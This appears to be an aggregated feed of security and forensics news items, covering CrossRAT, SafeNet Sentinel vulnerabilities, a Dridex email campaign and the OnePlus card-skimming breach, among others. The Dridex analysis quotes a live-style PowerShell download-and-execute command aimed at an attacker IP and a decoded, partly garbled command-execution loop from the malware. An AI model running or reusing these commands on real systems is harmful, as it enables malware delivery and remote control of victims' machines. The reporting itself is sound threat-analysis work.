ShadowHammer: Malicious updates for ASUS laptops

Operation ShadowHammer

ESET: #RANSOMWARE an enterprise perspective (paper-pdf) https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_Ransomware_Enterprise.pdf

Cuidado con el malware: ya sobrevive incluso a las reinstalaciones de los sistemas operativos 

Creating a digital forensic laboratory: Tips and Tricks | Digital Forensics | Computer Forensics | Blog

See on Scoop.it - Forensics

Forensic disk acquisition over the network –

See on Scoop.it - Forensics

In some occasions you need to acquire an image of a computer using a boot disk and network connectivity. Usually, this approach is made with a Linux boot disk on the machine under analysis, and another computer used as imaging collection platform, connected via a network hub or through a crossover cable. The reasons this…

Malware Delivered via Windows Installer Files

See on Scoop.it - Security

SANS Internet Storm Center - A global cooperative cyber threat / internet security monitor and alert system. Featuring daily handler diaries with summarizing and analyzing new threats to networks and internet security events.

CrossRAT a Trojan built with Java that infects Windows, macOS, Linux and Solaris

See on Scoop.it - Security

SOURCE: Information Security Newspaper http://www.securitynewspaper.com/2018/02/16/crossrat-trojan-built-java-infects-windows-macos-linux-solaris/ TAGS: Linux, macOS, Solaris, Windows Last week companies specialized in cyber security discovered the existence of a new Persistent Advanced Threat APT, supposedly sponsored by Dark Caracal, an organization dedicated to espionage. Since 2012, he has performed in 21 countries and has focused on mobile platforms, perhaps because of the large number of Android devices without support that are still in operation. Recently they have developed a cross-platform remote access RAT Trojan called CrossRAT. It is undetectable and can infect Windows, MacOS, Linux and Solaris. According to a information security expert, among the malicious actions that can be carried out are being able to access remotely to manipulate files of the system, take screenshots, put into operation arbitrary executables and have persistent access to the infected device. The cyber security researchers say that Dark Caracal does not rely on any zero-day vulnerability, but uses basic social engineering through Facebook groups and WhatsApp messages. CrossRAT is built with Java, so it is easy to decompile it and reverse engineer it. CrossRAT, implements a file called hmar6.jar to check the operating system used and finish the installation process correctly. Then it tries to gather information about the infected system, including the version, the architecture and the kernel compilation. On Linux systems that use systemd, it is dedicated to consulting the init files to determine the distribution. Most of the popular distributions like, Ubuntu, Fedora, openSUSE, RHEL 7, Arch Linux, Mageia and Manjaro, use systemd. CrossRAT implements specific mechanisms for each operating system that are executed one or more times to cause a reboot and register the infected computer to the command and control server of Dark Caracal, allowing the attackers to send commands and extract data, this shows that the malware was created for the purpose of surveillance. It connects to the flexberry.com domain through port 2223. According to information security professionals its surprising that it has no predefined order to activate the keylogger, because the feature cannot be activated, from the command and control server, something that can be justified in that it is still at an early stage of development.

Information Security Newspaper http://www.securitynewspaper.com/2018/02/16/crossrat-trojan-built-java-infects-windows-macos-linux-solaris/

How to use “The Sleuth Kit” and “Autopsy” | Part 2 by Animesh Shaw - tools, google, tool

See on Scoop.it - Forensics

tools, google, tool - Quick OverviewIn the section we will learn about the following topics:Creating a Sample Case for 4n6 Study.Learning How to Use FTK Imager.

CyberEdge Cyberthreat Defense Report Infographic

See on Scoop.it - Security

CyberEdge's comprehensive study and infographic of 1,100 security professionals' perceptions of the industry - fourth annual survey

Cheat sheets & Infographics

See on Scoop.it - Forensics

A silver bullet for the attacker

See on Scoop.it - Security

SOURCE: Information Security Newspaper http://www.securitynewspaper.com/2018/01/25/silver-bullet-attacker/ TAGS: HTTP protocol, silver bullet

A study into the security of hardware license tokens. In the past years, the problem of vulnerabilities in industrial automation systems has been becoming increasingly important. The fact that industrial control systems have been developing in parallel with IT systems, relatively independently and often without regard for modern secure coding practices is probably the main source of ICS security problems. As a result of this, numerous custom solutions have appeared, including proprietary network protocols and algorithms for authentication and encryption. It is these solutions that were the main source of threats discovered by ICS IT security researchers. At the same time, we can see that industrial automation systems derive some of their problems from common technologies (examples include CodeSys Runtime, Microsoft Windows vulnerabilities, etc.).

Companies attach different priority levels to such problems and the risks associated with them. It is obvious for everybody that vulnerability information should never be disclosed until a patch is released. However, many companies believe that this information should not be published even when a patch is available. For software developers, this is always a blow to their reputation. And companies that use vulnerable systems are not always physically able to install a patch or this installation may involve significant costs (interrupted operation of the systems to be updated, the cost of work related to installing updates, etc.). We assess risks based on our experience of a security system developer and supplier. We are convinced that it is absolutely essential to inform users of vulnerable software about the new threat and the need to update their software as soon as possible. This certainly does not guarantee that all users of vulnerable systems will promptly update them and the threat will go away. However, in our experience, if this is not done very few users update their systems in a timely manner, even if patches are available. We confront hundreds of thousands of new threats every day and we can see that threat actors are on a constant lookout for new attack opportunities. And we realize that by keeping silent about problems we give those threat actors a chance. This is why we decided to share information on one of our discoveries: according to our research, connecting a software license management token to a computer may open a hidden remote access channel for an attacker. Why we decided to analyze SafeNet Sentinel While performing various penetration tests, Kaspersky Lab ICS CERT experts repeatedly encountered the same service on the computers of customers who used software and hardware solutions by different industrial vendors. The experts didn’t attach much importance to it until it was found to be vulnerable. The service was hasplms.exe, which is part of the SafeNet Sentinel hardware-based solution by Gemalto. The solution provides license control for software used by customers and is widely used in ICS and IT systems. The solution’s software part consists of a driver, a web application and a set of other software components. The hardware part is a USB token. The token needs to be connected to a PC or server on which a software license is required. Some of the USB token models are listed in the table below. License control solutions of this type are based on the following operating principles: a software product requires a license to operate properly; when a USB token is plugged into the computer, the software “sees” the license and becomes fully functional. The token must be plugged in every time the software is started and remain connected while it is in use. The software part of the Gemalto solution is installed once and remains functional regardless of the life cycle of the software requiring a token. This Gemalto solution is used in products by other software vendors, including such companies as ABB, General Electric, HP, Cadac Group, Zemax and many other organizations, the number of which, according to some estimates, reaches 40 thousand. According to the results of independent research conducted by Frost and Sullivan in 2011, SafeNet Sentinel, which is currently owned by Gemalto, has a 40% market share for license control solutions in North America and over 60% in Europe. The number of end users who use Gemalto solutions is not known. However, if each company has 100 clients, the number of users is in the millions. Unfortunately, few people realize that connecting a token to a computer to control licenses may not be a safe thing to do. Vulnerabilities and attack vectors From researchers’ viewpoint, hasplms.exe exhibited a rather curious behavior in the system: it could be remotely accessed and communicated with on open port 1947. The protocol type was defined by the network packet header – either HTTP or a proprietary binary protocol was used. The service also had an API of its own, which was based on the HTTP protocol. Analyzing the service was made more difficult by the fact that the binary file used a VMProtect-type protector and generated its bytecode from the original Gemalto code. Due to this, it was decided to use fuzzing as the main tool for analyzing the vulnerable service’s behavior. First of all, we looked at the localization function – the user could download language packs consisting of two files, one of which was localize.xml. The second file, in HTML format, had parameters, one of which turned out to be vulnerable to buffer overflow. It would have been a simple vulnerability, if it wasn’t for one curious detail: although, as mentioned above, a protector was used, for some reason the developers did not use any of the classical mechanisms providing protection from such binary vulnerabilities (such as Stack Canary, Stack Cookie, ASLR, etc.). As a result, a simple buffer overflow could allow an attacker to execute arbitrary code on the remote system. Note that such software development flaws are very rare in modern solutions. As a rule, secure coding practices are implemented when developing serious commercial products (such as SDL – security development lifecycle), which means that security is designed into applications at the development stage, rather than being implemented as an additional option. This attack vector can be used without LPE (local privilege escalation) – the vulnerable process runs with SYSTEM privileges, enabling malicious code to run with the highest privileges.

Sample script loading a language pack file

Result of Buffer Overflow exploitation, leading to RCE

The vulnerability was assigned the number CVE-2017-11496. This was just one of the vulnerabilities we found. And the overall result of our research was disquieting. In late 2016 – early 2017, 11 vulnerabilities were identified: two allowed remote code execution if exploited and nine were denial-of-service vulnerabilities. By June 2017, Kaspersky Lab ICS CERT had identified three more vulnerabilities: an XML bomb and two denial-of-service flaws, one of which could potentially lead to remote execution of arbitrary code. In total, 14 vulnerabilities have been identified, all quite dangerous (for example, exploitation of each of the Remote Execution of Arbitrary Code type vulnerabilities is automatically performed with SYSTEM privileges, i.e., the highest privilege level in Windows). All attack vectors affecting the vulnerable service were multi-stage. We promptly sent all information on the vulnerabilities identified to Gemalto. The vulnerabilities were assigned the following respective CVE numbers: CVE-2017-11496 – Remote Code Execution CVE-2017-11497 – Remote Code Execution CVE-2017-11498 – Denial of Service CVE-2017-12818 – Denial of Service CVE-2017-12819 – NTLM hash capturing CVE-2017-12820 – Denial of Service CVE-2017-12821 – Remote Code Execution CVE-2017- 12822 – Remote manipulations with configuration files In addition to vulnerability descriptions, we sent a description of peculiar functionality to Gemalto. Peculiar functionality Kaspersky Lab ICS CERT experts have found that hasplms.exe has some rather unusual functionality: When a Gemalto USB token is first connected to a computer (even if the active session is blocked), a driver and service that accepts network connections on port 1947 are installed if the Internet access is available. If a driver is manually downloaded from the Gemalto website and installed, a driver and service that accept network connections on port 1947 are installed and port 1947 is added to Windows firewall exceptions. If Gemalto software is installed as part of a third-party installation file, port 1947 is also added to Windows firewall exceptions. There is an API function which enables or disables the administrative panel in the web interface, making it possible to modify the settings of the program part of the SafeNet Sentinel hardware-based solution. The panel is available by default on the localhost IP address – 127.0.0.1. The API can be used to change the internal proxy settings for updating language packs. After changing the proxy server, the service’s internal logic can be used to obtain the NTLM hash of the user account under which the hasplms.exe process is running (i.e., SYSTEM). This appears to be an undocumented feature and can be used for stealthy remote access. This means that remote attackers can use these capabilities to gain access to the administrative panel of the Gemalto software, carry out attacks with system user privileges and conceal their presence after completing these attacks. As mentioned above, Gemalto representatives were informed of this attack vector. Non-transparent security Solutions, technologies or individual software modules used by many third-party vendors often do not undergo proper security testing. This potentially opens up new attack vectors. At the same time, closing vulnerabilities in such products, which are often used, among other applications, in banking and industrial control systems, is not always a smooth process: for some reason, vendors of such systems are in no hurry to notify their users of problems identified in their products. In early 2017, we sent information about 11 vulnerabilities we had identified to Gemalto. It was only in late June that, in response to our repeated requests, the vendor informed us that a patch had been released and information about the vulnerabilities that had been closed, as well as a new version of the driver, could be found on the company’s internal user portal. On June 26, we informed Gemalto of the suspicious functionality and of three more vulnerabilities. This time, things went quicker: on July 21 the vendor released a private notice on a new driver version – without any mention of the vulnerabilities closed. According to Gemalto, the company has notified all of its customers of the need to update the driver via their account dashboards. However, this was apparently not sufficient: after we published information about the vulnerabilities identified, we were contacted by several developers of software which uses hasplms. It became clear from our communication with them that they were not aware of the problem and continued to use versions of the product with multiple vulnerabilities. Update software to the current version (7.6) ASAP We urge those users and companies that use Gemalto’s SafeNet Sentinel to install the latest (secure) version of the driver as soon as possible or contact Gemalto for instructions on updating the driver. We also recommend closing port 1947, at least on the external firewall (on the network perimeter) – but only as long as this does not interfere with business processes. In the case of installing the driver via Microsoft Windows Update servers, we recommend checking hasplms.exe to make sure it is the latest version. If an obsolete version is used, it is crucial to install the latest (secure) version of the driver from the vendor’s website or contact Gemalto for instructions on updating the driver. We also recommend closing port 1947, at least on the external firewall (on the network perimeter) – but only as long as this does not interfere with business processes. This will help to reduce the risk of the vulnerabilities being exploited. Some software vendors who use third-party solutions as part of their products may be very thorough about the security of their own code, while leaving the security of third-party solutions to other companies (the vendors of these solutions). We very much hope that most companies act responsibly both with respect to their own solutions and with respect to third-party solutions used in their products. Source:https://securelist.com/a-silver-bullet-for-the-attacker/83661/

Information Security Newspaper http://www.securitynewspaper.com/2018/01/25/silver-bullet-attacker/

Installing SIFT Workstation under Windows Subsystem for Linux

See on Scoop.it - Forensics

SIFT In a recent post I alluded to the fact that I had successfully installed SIFT Workstation under Windows Subsystem for Linux (WSL).

Installing SIFT Workstation under Windows Subsystem for Linux

See on Scoop.it - Forensics

SIFT In a recent post I alluded to the fact that I had successfully installed SIFT Workstation under Windows Subsystem for Linux (WSL).

NEW YEAR, NEW LOOK - DRIDEX VIA COMPROMISED FTP

See on Scoop.it - Security

SOURCE: Information Security Newspaper http://www.securitynewspaper.com/2018/01/19/new-year-new-look-dridex-via-compromised-ftp/ TAGS: Dridex, Dridex banking Trojan Forcepoint Security Labs have recently observed a peculiar email campaign distributing a variant of the Dridex banking trojan. The campaign used compromised FTP sites instead of the more usual HTTP link as download locations for malicious documents, exposing the credentials of the compromised FTP sites in the process. The malicious emails were distributed just before 12:00 UTC on 17 January 2018 and remained active for approximately seven hours. The emails were sent primarily to .COM top level domains (TLDs) with the second, third and fourth top affected TLDs suggesting that major regional targets were France, the UK, and Australia respectively: The sender domains used are observed to be compromised accounts. The sender names rotated around the following names, perhaps to make the emails look more convincing to unsuspecting recipients: admin@ billing@ help@ info@ mail@ no-reply@ sale@ support@ ticket@ Below is a sample malicious email: The campaign used two types of documents. The first is a DOC that abuses DDE to execute the following shell command to download malware: c:\Windows\system32\cmd.exe /k Echo Microsoft Office Document YES && pow^ers^hell.e^xe -W hidden -Exec Bypass -nologo -noprofile -c IEX(New-Object Net.WebClient).DownloadString('http://185.176.221[.]146/download/s/GTz') The above link downloads a B64 encoded string that decodes to the following download code: while (1 -eq 1) try % 0 ; while(($i=$zm.Read($bt,0,$bt.Length)) -ne 0) $d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i); $st= ([text.encoding]::ASCII).GetBytes((iex $d 2>&1)); $zm.Write($st,0,$st.Length); $zm.Flush() catch Start-Sleep -s 10; if($zcl.Connected) $zcl.Close(); } The second type is a XLS file with a Macro that downloads Dridex from the following location: hxxp://theairlab[.]co.za/KJHdey3 It is then executed using the following command: cmd.exe /c START "" C:\Users\<redacted>\AppData\Local\Temp\vanilaice8.exe ANALYSIS The compromised servers do not appear to be running the same FTP software; as such, it seems likely that the credentials were compromised in some other way. The perpetrators of the campaign do not appear to be worried about exposing the credentials of the FTP sites they abuse, potentially exposing the already-compromised sites to further abuse by other groups. This may suggest that the attackers have an abundant supply of compromised accounts and therefore view these assets as disposable. Equally, if a compromised site is used by multiple actors it also makes attribution harder for security professionals and law enforcement. Multiple attributes of the campaign suggest that it may coming from the Necurs botnet: The domains used for distribution were already in our records as compromised domains used in previous Necurs campaigns; Necurs is historically known to spread Dridex; The document downloaders are also similar to those used by Necurs in the past; The download locations of the XLS file also follows the traditional Necurs format. However, the volume of this particular campaign is very low compared to typical Necurs campaigns. Necurs typically sends out millions of emails per campaign, while this campaign was recorded sending just over 9.5K emails in total. Necurs has recently been recorded using malicious links (as opposed to malicious attachments) to distribute Dridex, but the switch to FTP-based download URLs is an unexpected change. PROTECTION STATEMENT Forcepoint customers are protected against this threat at the following stages of attack: Stage 2 (Lure) - Malicious e-mails associated with this attack are identified and blocked. Stage 5 (Dropper File) - Mallicious files are prevented from being downloaded. Stage 6 (Call Home) - Attempts by Dridex to contact its C&C server are blocked. CONCLUSION Cybercriminals constantly update their attack methods to try and ensure maximum infection rates. In this case FTP sites were used, perhaps in an attempt to prevent being detected by email gateways and network policies that may consider FTPs as trusted locations. The presence of FTP credentials in the emails highlights the importance of regularly updating passwords: a compromised account may be abused multiple times by different actors as long as the credentials remain the same. Although there are attributes of the campaign that suggest it is coming from Necurs, the size of the campaign is more or less 'average'. Given Necurs' typical association with very large campaigns, the reason for this remains something of a mystery. Source:https://blogs.forcepoint.com/security-labs/new-year-new-look-dridex-compromised-ftp Information Security Newspaper http://www.securitynewspaper.com/2018/01/19/new-year-new-look-dridex-via-compromised-ftp/

OnePlus confirms hack exposed credit cards of phone buyers

See on Scoop.it - Security

SOURCE: Information Security Newspaper http://www.securitynewspaper.com/2018/01/20/oneplus-confirms-hack-exposed-credit-cards-phone-buyers/ TAGS: credit cards, hack exposed, OnePlus

The company put a hold on payments through its site after fraud reports emerged.

OnePlus has confirmed that its systems have been breached, following reports of credit card fraud from customers who bought a phone from the company. The phone maker sent an email to customers Friday, saying customers' credit card numbers, expiry dates, and security codes "may have been compromised." The email, posted by Peter Smallbone on Twitter, said: "As soon as we were made aware of the attack, we launched an urgent investigation. We suspended credit card payments and have been working with a cybersecurity firm to reinforce our systems." Several customers also posted the same email on the company's forums on Friday. The company is "looking" to provide credit card monitoring for customers affected. A malicious script was inserted on the company's pages, capturing and sending data directly from the user's browser. The script, now removed, is said to have "operated intermittently." The company said customers who entered their credit card details on the company's site between mid-November and January 11 may be affected. The company said that may include "up to 40,000" customers. Anyone who paid with PayPal aren't affected, neither are those who paid with a previously saved credit card on file. A OnePlus spokesperson did not comment beyond the company's statement. Reports of credit card fraud started popping up over the weekend. On Thursday, the company said it was looking into a "serious issue" and "as a precaution, we are temporarily disabling credit card payments" on its site. Source:http://www.zdnet.com/article/oneplus-confirms-hack-exposed-credit-cards-of-phone-buyers/

Information Security Newspaper http://www.securitynewspaper.com/2018/01/20/oneplus-confirms-hack-exposed-credit-cards-phone-buyers/

Unos hackers han podido robar los datos sanitarios de más de la mitad de la población de Noruega

See on Scoop.it - Security

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/hacking-incidentes/unos-hackers-han-podido-robar-los-datos-sanitarios-de-mas-de-la-mitad-de-la-poblacion-de-noruega/ TAGS: hackers, Norway Parece que un grupo de hackers o un hacker individual ha robado los datos sanitarios de más de la mitad de la población de Noruega, según informan diversos medios locales. El ataque habría sido realizado el pasado 8 de enero, cuando la Autoridad de Salud Regional Health South-East (en el sudeste del país) anunció una brecha de seguridad en su sitio web. HelseCERT, que es el Equipo de Respuesta ante Emergencias Informáticas del sector sanitario noruego, ha identificado tráfico sospechoso procedente de la red de Health South-East. Una investigación llevada a cabo por el personal IT de Sykehuspartner HF, empresa perteneciente a Health South-East, ha mostrado evidencias de una importante brecha de datos. En una declaración conjunta realizada por Health South-East y Sykehuspartner HF se ha explicado que “esta es una situación grave y se han tomado medidas para limitar el daño causado por este incidente”. Health South-East no duda que ha sido “un jugador profesional y avanzado” el que está detrás del ataque, mientras que las fuerzas de la ley y el Equipo de Respuesta ante Emergencias Informáticas nacional han sido notificados para que procedan a actuar. El Ministro de Sanidad ha comentado que entre las medidas tomadas está la eliminación de la amenaza. Health South-East gestiona la sanidad en nueve de los dieciocho condados de los que se compone Noruega, incluyendo la capital y ciudad más poblada del país, Oslo. Esto aumenta de forma significativa la cantidad de personas afectadas, que podría ascender a los 2,9 millones de los 5,2 millones de habitantes que tiene Noruega. La situación está generando bastante alarma en el país. Por un lado hay algunos investigadores en seguridad de la propia Noruega que critican a Health South-East por la pobre seguridad implementada en sus sistemas, mientras que la autoridad sanitaria está pidiendo calma para evitar que la tensión vaya a más. Sin embargo, muchos sospechan que se está escondiendo muchos datos en torno a este asunto. Fuente:https://www.muyseguridad.net/2018/01/19/hackers-robar-datos-sanitarios-noruega/ Noticias de seguridad informática http://noticiasseguridad.com/hacking-incidentes/unos-hackers-han-podido-robar-los-datos-sanitarios-de-mas-de-la-mitad-de-la-poblacion-de-noruega/